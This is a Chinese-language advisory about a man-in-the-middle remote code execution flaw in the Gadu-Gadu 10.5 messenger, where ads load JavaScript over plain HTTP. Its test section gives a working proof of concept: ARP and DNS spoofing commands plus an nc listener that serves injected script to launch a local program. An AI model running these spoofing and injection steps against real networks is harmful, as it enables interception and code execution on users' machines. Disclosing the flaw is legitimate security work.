Gadu-Gadu远程代码执行漏洞

漏洞起因
输入验证错误
危险等级

 
影响系统
Gadu-Gadu 10.5
 
不受影响系统
 
危害
远程攻击者可以利用漏洞以应用程序权限执行任意代码。
 
攻击所需条件
攻击者必须访问Gadu-Gadu。
 
漏洞信息
Gadu-Gadu是一款在线即时聊天程序。
Gadu-Gadu受中间人攻击影响允许在目标主机上执行任意代码。从外部HTTP位置装载JavaScript代码来显示广告。如果攻击者可以截取HTTP请求可能注入JS代码到Webkit用户接口。内部通信机制可用于派生新进程,由于广告是自动加载的因此此漏洞无需用户交互或需要存在于联系人列表中。
 
测试方法
# echo 1 > /proc/sys/net/ipv4/ip_forward
 # arp -s GW_IP GW_MAC
 # arpspoof -i eth0 GW_IP
 # echo "YOURIP *.adocean.pl" > /tmp/x
 # dnsspoof -i eth0 -f /tmp/x
 # while [ 1 ] ; do echo -ne "HTTP/1.0 200 OK\r\nConnection:
 close\r\nContent-Length: 239\r\nContent-Type:
 text/html\r\n\r\nb=document.getElementsByTagName(\"body\").item(0);\r\nb.innerHTML='<a
 id=\"a\" href=\"c:/windows/notepad.exe\"></a>’;\r\na=document.getElementById(‘a’);\r\ne=document.createEvent(‘HTMLEvents’);\r\ne.initEvent(‘click’,
 true, true);\r\na.dispatchEvent(e);\r\n" | nc -l 80 ; done
 
厂商解决方案
目前没有详细解决方案提供:
http://www.gadu-gadu.pl/nwersja.htm
 
漏洞提供者
Kacper Szczesniak
 
漏洞消息链接
http://archives.neohapsis.com/archives/fulldisclosure/2011-05/0517.html

发表评论?

0 条评论。

发表评论